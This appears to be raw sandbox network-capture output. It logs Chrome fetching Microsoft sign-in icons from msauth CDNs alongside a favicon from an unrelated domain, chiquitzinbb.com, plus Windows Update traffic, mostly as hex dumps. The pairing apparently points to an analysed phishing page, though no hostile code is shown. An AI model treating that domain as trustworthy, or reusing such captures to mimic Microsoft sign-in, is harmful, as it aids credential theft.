                                        16192.168.2.164972413.107.246.454436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:26 UTC418OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                        Host: aadcdn.msauth.net
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:26 UTC800INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:26 GMT
                                        Content-Type: image/svg+xml
                                        Content-Length: 1435
                                        Connection: close
                                        Cache-Control: public, max-age=31536000
                                        Content-Encoding: gzip
                                        Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                        ETag: 0x8DB5C3F4911527F
                                        x-ms-request-id: 42585084-601e-001f-6c1c-257052000000
                                        x-ms-version: 2009-09-19
                                        x-ms-lease-status: unlocked
                                        x-ms-blob-type: BlockBlob
                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                        Access-Control-Allow-Origin: *
                                        x-azure-ref: 20241024T014026Z-r197bdfb6b4lbgfqwkqbrm672s00000000q000000000p6x7
                                        x-fd-int-roxy-purgeid: 0
                                        X-Cache: TCP_HIT
                                        X-Cache-Info: L1_T2
                                        Accept-Ranges: bytes
                                        2024-10-24 01:40:26 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                        Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.164972513.107.246.454436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:26 UTC438OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                        Host: aadcdn.msauth.net
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:26 UTC779INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:26 GMT
                                        Content-Type: image/svg+xml
                                        Content-Length: 2407
                                        Connection: close
                                        Cache-Control: public, max-age=31536000
                                        Content-Encoding: gzip
                                        Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                        ETag: 0x8DB5C3F499A9B99
                                        x-ms-request-id: 46ed0eab-901e-0037-7d52-222e57000000
                                        x-ms-version: 2009-09-19
                                        x-ms-lease-status: unlocked
                                        x-ms-blob-type: BlockBlob
                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                        Access-Control-Allow-Origin: *
                                        x-azure-ref: 20241024T014026Z-15b8d89586f8l5961kfst8fpb000000008hg00000000ecsm
                                        x-fd-int-roxy-purgeid: 0
                                        X-Cache: TCP_HIT
                                        Accept-Ranges: bytes
                                        2024-10-24 01:40:26 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                        Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.164972813.107.246.454436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:26 UTC421OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                        Host: aadcdn.msauth.net
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:26 UTC799INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:26 GMT
                                        Content-Type: image/svg+xml
                                        Content-Length: 199
                                        Connection: close
                                        Cache-Control: public, max-age=31536000
                                        Content-Encoding: gzip
                                        Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                        ETag: 0x8DB5C3F49C21D98
                                        x-ms-request-id: 08eba4be-301e-0057-6db6-211ada000000
                                        x-ms-version: 2009-09-19
                                        x-ms-lease-status: unlocked
                                        x-ms-blob-type: BlockBlob
                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                        Access-Control-Allow-Origin: *
                                        x-azure-ref: 20241024T014026Z-16849878b785jsrm4477mv3ezn0000000700000000009tcu
                                        x-fd-int-roxy-purgeid: 0
                                        X-Cache-Info: L1_T2
                                        X-Cache: TCP_HIT
                                        Accept-Ranges: bytes
                                        2024-10-24 01:40:26 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                        Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.164972713.107.246.454436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:26 UTC416OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                        Host: logincdn.msauth.net
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:26 UTC799INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:26 GMT
                                        Content-Type: image/svg+xml
                                        Content-Length: 276
                                        Connection: close
                                        Cache-Control: public, max-age=31536000
                                        Content-Encoding: gzip
                                        Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                        ETag: 0x8D79ED35591CF44
                                        x-ms-request-id: 950426cf-501e-0066-6877-258c76000000
                                        x-ms-version: 2009-09-19
                                        x-ms-lease-status: unlocked
                                        x-ms-blob-type: BlockBlob
                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                        Access-Control-Allow-Origin: *
                                        x-azure-ref: 20241024T014026Z-15b8d89586f8nxpt5xx0pk7du80000000460000000008uce
                                        x-fd-int-roxy-purgeid: 0
                                        X-Cache: TCP_HIT
                                        X-Cache-Info: L1_T2
                                        Accept-Ranges: bytes
                                        2024-10-24 01:40:26 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                        Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.1649729184.28.90.27443
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:26 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                        Connection: Keep-Alive
                                        Accept: */*
                                        Accept-Encoding: identity
                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                        Range: bytes=0-2147483646
                                        User-Agent: Microsoft BITS/7.8
                                        Host: fs.microsoft.com
                                        2024-10-24 01:40:26 UTC514INHTTP/1.1 200 OK
                                        ApiVersion: Distribute 1.1
                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                        Content-Type: application/octet-stream
                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                        Server: ECAcc (lpl/EF06)
                                        X-CID: 11
                                        X-Ms-ApiVersion: Distribute 1.2
                                        X-Ms-Region: prod-weu-z1
                                        Cache-Control: public, max-age=54360
                                        Date: Thu, 24 Oct 2024 01:40:26 GMT
                                        Content-Length: 55
                                        Connection: close
                                        X-CID: 2
                                        2024-10-24 01:40:26 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        21192.168.2.1649732152.199.21.1754436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:26 UTC424OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                        Host: aadcdn.msftauth.net
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:27 UTC738INHTTP/1.1 200 OK
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                        Age: 18389198
                                        Cache-Control: public, max-age=31536000
                                        Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                        Content-Type: image/svg+xml
                                        Date: Thu, 24 Oct 2024 01:40:26 GMT
                                        Etag: 0x8DB5C3F4AC59B47
                                        Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                        Server: ECAcc (lhc/78BB)
                                        Vary: Accept-Encoding
                                        X-Cache: HIT
                                        x-ms-blob-type: BlockBlob
                                        x-ms-lease-status: unlocked
                                        x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                        x-ms-version: 2009-09-19
                                        Content-Length: 1636
                                        Connection: close
                                        2024-10-24 01:40:27 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.1649734157.230.134.734436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:26 UTC351OUTGET /favicon.ico HTTP/1.1
                                        Host: chiquitzinbb.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-10-24 01:40:27 UTC276INHTTP/1.1 200 OK
                                        Date: Thu, 24 Oct 2024 01:40:26 GMT
                                        Server: Apache
                                        Last-Modified: Sat, 09 May 2020 23:50:03 GMT
                                        ETag: "1bb33-5a53fc5cd436b"
                                        Accept-Ranges: bytes
                                        Content-Length: 113459
                                        X-Powered-By: PleskLin
                                        Connection: close
                                        Content-Type: image/vnd.microsoft.icon
                                        2024-10-24 01:40:27 UTC16384INData Raw: 00 00 01 00 07 00 00 00 00 00 01 00 20 00 2d 2c 00 00 76 00 00 00 80 80 00 00 01 00 20 00 28 08 01 00 a3 2c 00 00 40 40 00 00 01 00 20 00 28 42 00 00 cb 34 01 00 30 30 00 00 01 00 20 00 a8 25 00 00 f3 76 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 9b 9c 01 00 18 18 00 00 01 00 20 00 88 09 00 00 43 ad 01 00 10 10 00 00 01 00 20 00 68 04 00 00 cb b6 01 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 20 00 49 44 41 54 78 9c ed 9d 79 60 54 d5 f5 c7 bf b3 4f 32 33 49 26 7b 20 2b 4b c2 92 b0 13 24 6c 15 01 85 8a a8 55 ac 1b 5a 5b 45 ad 56 6b 5b 7f 6d dd ea 5a b5 ad d6 a5 d6 5a 5b 17 6c ad 0a 6a 95 3d 61 87 20 90 90 04 48 02 81 2c 64 cf 90 4c
                                        Data Ascii: -,v (,@@ (B400 %v C hPNGIHDR\rfpHYsod IDATxy`TO23I&{ +K$lUZ[EVk[mZZ[lj=a H,dL
                                        2024-10-24 01:40:27 UTC16384INData Raw: ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff fd fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                        Data Ascii: ------------------------------------------------
                                        2024-10-24 01:40:27 UTC16384INData Raw: ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff fd fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                        Data Ascii: ------------------------------------------------
                                        2024-10-24 01:40:27 UTC16384INData Raw: ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff fd fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                        Data Ascii: ------------------------------------------------
                                        2024-10-24 01:40:27 UTC16384INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff fd fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f7 f5 ed ff a4 82 22 ff
                                        Data Ascii: "
                                        2024-10-24 01:40:27 UTC16384INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ef d6 99 ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff f8 ee d4 ff ff ff ff ff ff ff ff ff ed d0 8b ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff e5 bc 58 ff fc f9 f1 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f4 e4 bc ff df ab 2f ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff cc cc cc ff cc cc cc ff cc cc cc ff cc cc cc ff ff ff ff ff
                                        Data Ascii: ------------------------X/-------
                                        2024-10-24 01:40:27 UTC15155INData Raw: ae 35 ff df ab 2d ff df ab 2d ff df ab 2d ff df ab 2d ff dc af 40 ff cc cc cc ff cc cc cc ff ff ff ff ff fe fe fe fe ff ff ff ff fe fe fe fe fe fe fe fe ff ff ff ff fe fe fe fe fe fe fe fe ff ff ff ff fe fe fe fe ff ff ff ff fe fe fe fe fb f7 eb fe e2 b3 43 fe df ab 2d ff de aa 2c fe de aa 2c fe df ab 2d ff de aa 2c fe de aa 2c fe df ab 2d ff ea ca 7a fe fe fe fe fe fe fc f8 ff e1 b0 3b fe de aa 2c fe df ab 2d ff de aa 2c fe de aa 2c fe df ab 2d ff de aa 2c fe df ab 2d ff de aa 2c fe de aa 2c fe ea c9 78 ff fe fe fd fe fe fe fe fe ff ff ff ff fe fe fd fe ed d0 8a fe df ab 2d ff de aa 2c fe de aa 2c fe df ab 2d ff de aa 2c fe dc af 40 fe cb cb cb fe cc cc cc ff ff ff ff ff fe fe fe fe ff ff ff ff fe fe fe fe fe fe fe fe ff ff ff ff fe fe fe fe fe fe fe fe
                                        Data Ascii: 5----@C-,,-,,-z;,-,,-,-,,x-,,-,@


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.16497384.245.163.56443
                                        TimestampBytes transferredDirectionData
                                        2024-10-24 01:40:32 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zGHyCofktCX+BTC&MD=nWdxdK88 HTTP/1.1
                                        Connection: Keep-Alive
                                        Accept: */*
                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                        Host: slscr.update.microsoft.com
                                        2024-10-24 01:40:33 UTC560INHTTP/1.1 200 OK
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Content-Type: application/octet-stream
                                        Expires: -1
                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                        MS-CorrelationId: 79670a68-9e11-44b1-87f1-5084b608178e
                                        MS-RequestId: 36dcb110-8733-4aed-b81d-532431a87617
                                        MS-CV: QwtOIsjvvE2KLcAD.0
                                        X-Microsoft-SLSClientCache: 2880
                                        Content-Disposition: attachment; filename=environment.cab
                                        X-Content-Type-Options: nosniff
                                        Date: Thu, 24 Oct 2024 01:40:32 GMT
                                        Connection: close
                                        Content-Length: 24490
                                        2024-10-24 01:40:33 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                        Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
